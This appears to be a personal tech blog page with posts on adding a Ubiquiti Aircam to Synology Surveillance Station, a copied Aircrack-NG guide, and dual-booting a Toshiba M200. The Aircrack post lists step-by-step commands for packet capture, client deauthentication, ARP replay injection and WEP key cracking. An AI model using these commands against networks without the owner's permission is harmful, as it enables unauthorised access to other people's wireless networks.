Computing

Connecting Ubiquiti Aircam to Synology NAS – Surveillance Station 6.1-2941

3phase172 Comments

How to:

This requires you to modify .conf files on your Synology NAS. If you are not familiar with how to do this or are not good in a UNIX terminal, you may want to investigate adding this package to your NAS before starting (for file editing): http://mertymade.com/syno/#cfe

Make sure both your UBNT Aircam and the Synology NAS are running most current (current date 2/20/2014) firmware/packages.

Start the SSH service on your NAS if you wish to SSH into it using Putty or some other flavor of client. Do this by logging into your NAS, selecting Control Panel, then clicking on Terminal. Select ‘Enable SSH service’ and click apply. Confirm that Surveillance Station 6.1 is already shut down before editing files (you can confirm this in the package manager)

SSH into your NAS by entering the IP address and using the default port. Username:  root, password: admin

Example: Type ssh root@192.168.1.2 hit return and then wait for prompt and enter the password “admin”. Replace the IP address with your NAS IP address and if you have changed your root password (you really should) it will be something besides admin.

Navigate to and edit the following files (I used the vi command followed by a space and the file name):

/volume1/@appstore/SurveillanceStation/device_pack/

camera_support/camera_model.conf

Add under the {camera*list] (using vi, you click the insert button on your keyboard and then scroll up/down):

[camera*list]
UBNT*Aircam=UBNT*generic
D-Link*DCS-900=D-Link*generic
D-Link*DCS-2121=D-Link*generic-gr1
LINKSYS*WVC54GCA=LINKSYS*generic
TRENDNet*TV-IP100=TRENDNet*generic-gr1
TRENDNet*TV-IP100W=TRENDNet*generic-gr1
TRENDNet*TV-IP100-N=TRENDNet*generic-gr2
TRENDNet*TV-IP100W-N=TRENDNet*generic-gr2
TRENDNet*TV-IP212=TRENDNet*generic-gr3
TRENDNet*TV-IP212W=TRENDNet*generic-gr3
TRENDNet*TV-IP400=TRENDNet*generic-gr1
TRENDNet*TV-IP400W=TRENDNet*generic-gr1
TRENDNet*TV-IP410=TRENDNet*generic-ptz1
TRENDNet*TV-IP410W=TRENDNet*generic-ptz1
TRENDNet*TV-IP512P=TRENDNet*generic-gr4
SparkLAN*CAS-335=SparkLAN*generic-gr1
SparkLAN*CAS-335W=SparkLAN*generic-gr1
SparkLAN*CAS-633=SparkLAN*generic-gr2
SparkLAN*CAS-633W=SparkLAN*generic-gr2
SparkLAN*CAS-673=SparkLAN*generic-ptz1
SparkLAN*CAS-673W=SparkLAN*generic-ptz1
Sony*SNC-RZ30N=Sony*generic-gen1-ptz
Sony*SNC-RZ30P=Sony*generic-gen1-ptz
Sony*SNC-Z20N=Sony*generic-gen1-z
Sony*SNC-Z20P=Sony*generic-gen1-z
Siemens*CCIC1410-L=Siemens*generic-gr1
Siemens*CCIC1410-LA=Siemens*generic-gr1
Siemens*CCIC1410-LAW=Siemens*generic-gr1

Then add, down below where the camera port/streams are called out:

[UBNT*generic]
      port=554
      video source=”/live/ch01_0″
[D-Link*generic]
port=80
video source=video.cgi

etc.

Use ch00_0 for higher resolution video.

You then need to save that file (in vi, hit Esc, followed by a colon, followed by the letters ‘wq’ and then hit enter.

Next edit the following file:

/volume1/@appstore/SurveillanceStation/device_pack/

camera_support/UBNT.conf

It doesn’t exist (it will be blank and empty) however if you use VI (or similar editor) and save the contents, it will create the file for you.

Within that file, paste the following:

[UBNT*Aircam]
api = ubnt

channel_list = 1

default_channel = 1
resolutions_h264 = 640×480, 1280×720

default_resolution_h264 = 1280×720

fps_h264_[640×480] = 5,10,15,20,25,30
fps_h264_[1280×720] = 5,10,15,20,25,30
default_fps_h264_1280x720 = 10
default_fps_h264_640x480 = 10
default_image_quality = 5

h264 = rtsp

default_username = ubnt
default_password = ubnt

(Again, if in vi, hit Esc, then enter ‘:wq’ and hit return to save)

Restart your Surveillance Station 6.1 package and go add a new camera.

Select UBNT and Aircam.

Name your camera, enter port 554, your proper IP, and H.264 as your video type. Username and password need to match what you have set up on the Aircam in the web interface under video, RTSP Authentication (username/password). Synology only includes one free camera license per NAS unless you buy additional licences through them (search the web to find out more).

Hope you enjoy having your NAS directly talking with your Ubiquiti Aircam.

Thanks,

Using Intel PRO/Wireless 2200BG with AirCrack

3phase2 Comments

Shamelessly copied from another wordpress for my personal notes.
HOWTO: Aircrack-NG (Simple Guide)

This HOWTO is widely based on Aircrack’s own documentation. In addition you’ll find the latest version of “Aircrack Next Generation” here and Aircrack-PTW here

Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.

DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network’s security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0″ as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

PREREQUISITES:
1. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
2. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
3. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
    Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng –channel <channel> –write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng –channel <channel> –bssid 00:09:5B:D7:43:A8 –write<file_name> <interface>

    NOTE:
    –channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    –bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    –write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ’0′ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful :-)

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS<interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

Toshiba M200 Dual Boot

3phaseLeave a comment

So the OS was finally fragged on the M200 (XP Tablet Edition) that it would not even shut down correct, run most browsers, and regularly overheat (Toshiba’s power management software was crashing on computer boot).

So I decided that it would be good to dual boot Ubuntu 10.10 as well as Windows 7 (very impressed with the integrated features for laptops/tablets…like remembering display devices/settings, tablet functions, etc.) Needing Ubuntu for doing both Wifi related ‘stuff’ as well as probably for the new career path (all linux based computing at the office). I will include a ‘common’ file storage area for both operating systems to make things easy and easily shared across the platforms.

Apparently Ubuntu is very popular on the M200, so lots of people have configured the OS for all the screen weirdness that this computer can perform (rotate, pen input, resize, etc)

Not sure why XP Tablet got so fragged, but my guess is that after ~4 years of operating it heavily remotely, and picking up a few nasty virus that never quite got adequately irradicated, it just needed a good wipe. I like XP for stability, but Win7 really impressed me on my old work laptop so lets give it a shot. I can always throw XP in a background few gigs for the day that I find software that NEEDS XP.

Installing Ubuntu 10.10 over LAN

3phaseLeave a comment

https://help.ubuntu.com/community/Installation/WindowsServerNetboot

Useful, but was very buggy when it came down to pulling the image off of a remote server. Couldn’t get it to work, and besides, I needed the linux partition manager booted up via the “Live” version…no install (my Toshiba M200 doesn’t recognize the external PCMCIA optical drive under linux…AND doesn’t have boot from USB (major failure))

Slick for most other machines though…especially if they don’t have drives or similar.